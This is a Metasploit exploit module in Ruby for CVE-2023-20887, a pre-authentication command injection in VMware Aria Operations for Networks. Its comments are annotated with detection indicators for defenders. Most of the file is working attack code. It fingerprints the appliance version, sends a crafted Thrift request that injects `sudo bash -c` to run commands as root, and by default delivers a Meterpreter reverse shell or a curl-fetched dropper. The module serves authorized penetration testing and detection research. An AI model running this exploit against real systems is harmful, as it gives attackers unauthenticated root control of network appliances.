##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2023-20887 (VMSA-2023-0012), an unauthenticated
# command injection reachable through the Apache Thrift RPC interface of
# VMware Aria Operations for Networks (vRealize Network Insight).
#
# Control flow: AutoCheck (prepended below) runs +check+, which calls
# +check_vrni+ to fingerprint the appliance; +exploit+ then dispatches on the
# selected target and ultimately calls +execute_command+.
#
# What a defender can look for, taken directly from the requests this module
# sends (the module declares IOC_IN_LOGS and ARTIFACTS_ON_DISK itself):
#   - a run of GETs to
#     /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.N.0/locales/en-GB/components/UI?pseudo=false
#     for N = 2..10 (fingerprinting);
#   - a POST to /saas./resttosaasservlet with Content-Type application/x-thrift
#     whose body names "createSupportBundle" and embeds `sudo bash -c '...'`.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  # Runs +check+ before +exploit+ so a non-vulnerable host is not fired at.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata. Nothing here talks to the network; the only values that
  # affect the exploit path are 'Targets' (see +exploit+), 'Payload' BadChars
  # (see +execute_command+) and the RPORT/SSL defaults.
  #
  # @param info [Hash] metadata passed in by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE',
        'Description' => %q{
          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection
          when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a
          remote unauthenticated attacker to execute arbitrary commands on the underlying operating system
          as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.
          VMware has evaluated the severity of this issue to be in the Critical severity range with a
          maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the
          context of 'root' on the appliance.
          VMWare 6.x version are vulnerable.

          This module exploits the vulnerability to upload and execute payloads gaining root privileges.
          Successfully tested against version 6.8.0.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Sina Kheirkhah', # Metasploit Module, PoC. (@SinSinology) of Summoning Team (@SummoningTeam) on twitter
          'Anonymous with Trend Micro Zero Day Initiative',
          'h00die' # msf module updates, corrections, qol
        ],
        'References' => [
          ['CVE', '2023-20887'],
          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'],
          ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'],
          ['URL', 'https://github.com/sinsinology/CVE-2023-20887']
        ],
        'DisclosureDate' => '2023-06-07',
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_CMD, ARCH_X64],
        # The injected command runs under sudo (see +execute_command+).
        'Privileged' => true,
        'Targets' => [
          [
            # Sends payload.encoded straight through +execute_command+; nothing is written to disk by the module itself.
            'Unix (In-Memory)',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD,
              'Type' => :in_memory,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            # Uses CmdStager to transfer an ELF with curl or printf, then executes it (on-disk artifact).
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'printf' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Payload' => {
          # "\x27" is a single quote: +execute_command+ wraps the command in bash -c '...'
          # so a quote in the payload would terminate that string early.
          'BadChars' => "\x27"
        },
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  # Fingerprints the appliance by probing the vRNIUI i18n translation endpoint
  # for product versions 6.2.0 through 6.10.0 in turn.
  #
  # A reply that is HTTP 200 and contains 'Failed to get locale list for vRNIUI'
  # is taken as "not this version, keep going"; any other outcome (a different
  # status, a body without that string, or no response at all) stops the loop.
  # The last response received is returned, so the caller sees nil on a network
  # failure and the 6.10.0 reply if every probe produced the failure string.
  #
  # @return [Object, nil] the last response from send_request_cgi, or nil
  def check_vrni
    res = nil
    (2..10).step do |x|
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.#{x}.0/locales/en-GB/components/UI"),
        'vars_get' => {
          'pseudo' => 'false'
        }
      })
      next if res && res.code == 200 && res.body.include?('Failed to get locale list for vRNIUI')

      break
    end
    res
  end

  # Delivers +cmd+ to the RPC servlet. Judging by the Content-Type and the body
  # shape, the body is a Thrift call to createSupportBundle in JSON form whose
  # second string field embeds the command in backticks as `sudo bash -c '...'`;
  # the other fields are filled with random values. This is the request a
  # web-server or proxy log will show for an exploitation attempt.
  #
  # Only a missing response is treated as failure: a non-2xx status is not
  # inspected, so a rejected request returns normally without raising.
  #
  # @param cmd [String] command to run on the appliance (must not contain "\x27")
  # @param _opts [Hash] unused; kept for the CmdStager execute_command callback signature
  # @return [void]
  def execute_command(cmd, _opts = {})
    print_status('Attempting to execute shell')
    shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"#{rand(1000..9999)}\"},\"2\":{\"str\":\"`sudo bash -c '#{cmd}'`\"},\"3\":{\"str\":\"#{Rex::Text.rand_text_alpha(4)}\"},\"4\":{\"lst\":[\"str\",2,\"#{Rex::Text.rand_text_alpha(4)}\",\"#{Rex::Text.rand_text_alpha(4)}\"]}}]"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/saas./resttosaasservlet'),
      'ctype' => 'application/x-thrift',
      'headers' => {
        'Accept' => 'application/json, text/plain, */*'
      },
      'encode_params' => false,
      'data' => shell
    })
    fail_with(Failure::Unknown, 'Communication error occurred') if res.nil?
  end

  # Decides whether the target is VMware Aria Operations for Networks
  # (vRealize Network Insight) and whether its reported version is in range:
  #   - no response from check_vrni                 -> CheckCode::Unknown
  #   - no JSON body, or data.productName != vRNIUI -> CheckCode::Safe
  #   - data.version within 6.2 .. 6.10 inclusive   -> CheckCode::Vulnerable
  #   - any other version                           -> CheckCode::Appears
  #
  # NOTE(review): body['data'] is indexed without a nil guard, so a JSON body
  # that has no 'data' key raises NoMethodError instead of returning Safe; and
  # get_json_document may hand back an empty Hash rather than nil on a
  # non-JSON body — confirm against the framework version in use.
  # NOTE(review): versions outside 6.2 .. 6.10 land on Appears, not Safe;
  # confirm this against the affected-version list in VMSA-2023-0012.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    print_status("Checking if #{peer} can be exploited.")
    res = check_vrni
    return CheckCode::Unknown('No response received from the target!') unless res

    body = res.get_json_document
    if body.nil? || body['data']['productName'] != 'vRNIUI'
      return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')
    end

    version = Rex::Version.new(body['data']['version'])
    return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{version} was found.") if version >= Rex::Version.new('6.2') && version <= Rex::Version.new('6.10')

    CheckCode::Appears("Target is running VMWare Aria Operations for Networks (vRealize Network Insight) version #{version}")
  end

  # Dispatches on the selected target's 'Type'. The in-memory target passes the
  # encoded command payload straight to +execute_command+; the dropper target
  # hands off to execute_cmdstager, which (per the CmdStager mixin) calls back
  # into +execute_command+ for each staging command. An unknown type does nothing.
  #
  # @return [void]
  def exploit
    case target['Type']
    when :in_memory
      print_status("Executing #{target.name} with #{payload.encoded}")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}")
      execute_cmdstager
    end
  end
end